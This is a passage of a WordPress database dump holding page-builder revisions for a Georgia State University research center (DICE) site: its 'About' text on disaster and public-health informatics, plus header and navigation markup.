practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',353,'https://gsudice.dataconn.net/?p=1844',0,'revision','',0),(1845,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',122,'https://gsudice.dataconn.net/?p=1845',0,'revision','',0),(1846,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',26,'https://gsudice.dataconn.net/?p=1846',0,'revision','',0),(1847,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path 